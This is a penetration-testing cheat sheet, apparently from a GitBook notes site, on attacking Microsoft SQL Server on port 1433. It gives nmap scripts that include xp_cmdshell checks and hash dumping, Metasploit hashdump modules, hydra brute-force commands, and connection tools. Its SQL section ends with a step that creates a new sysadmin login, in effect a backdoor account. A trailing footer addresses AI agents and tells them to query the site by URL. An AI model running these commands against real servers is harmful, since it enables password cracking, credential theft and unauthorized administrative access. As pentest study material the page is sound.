# Ms-SQL 1433

**To search for related scripts, look for** 

```
nmap --script-help "ms and sql"
```

**#Nmap** 

```
#one liner
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.11.1.13

nmap --script ms-sql-info -p 1433 10.0.0.0
nmap --script ms-sql-config -p 1433 10.0.0.0
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 10.0.0.0
nmap --script ms-sql-* -p 1433 10.0.0.0 
```

  **#Metasploit**                                                                                                                                           

```
msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
```

**#Bruteforcing**

```
hydra -L usernames.txt –p password 10.0.0.0 mssql
hydra -l username –P passwords.txt 10.0.0.0 mssql
```

**#Connect**

```
# impacket
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

# sqsh
sqsh -S <target-ip> -U username -P password
sqsh -S <target-ip> -U username -P password -D database
```

**#Commands**

```
# Get all users
> SELECT * FROM sys.database_principals

# Switch to the database
> USE <database>

# Get databases
> SELECT * FROM master.dbo.sysdatabases

# List tables
> SELECT * FROM information_schema.tables

# Get table content
> SELECT * FROM <database_name>.dbo.<table_name>

# Get the version of MSSQL
> SELECT @@version

# Check if the current user have permission to execute OS command
> USE master
> EXEC sp_helprotect 'xp_cmdshell'

# Get linked servers
> EXEC sp_linkedservers
> SELECT * FROM sys.servers

# Create a new user with sysadmin privilege
> CREATE LOGIN tester WITH PASSWORD = 'password'
> EXEC sp_addsrvrolemember 'tester', 'sysadmin'

# Get current username
> SELECT user_name()

```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://davidtancredi.gitbook.io/pentesting-notes/r3dcl1ff/enumeration/ms-sql-1433.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.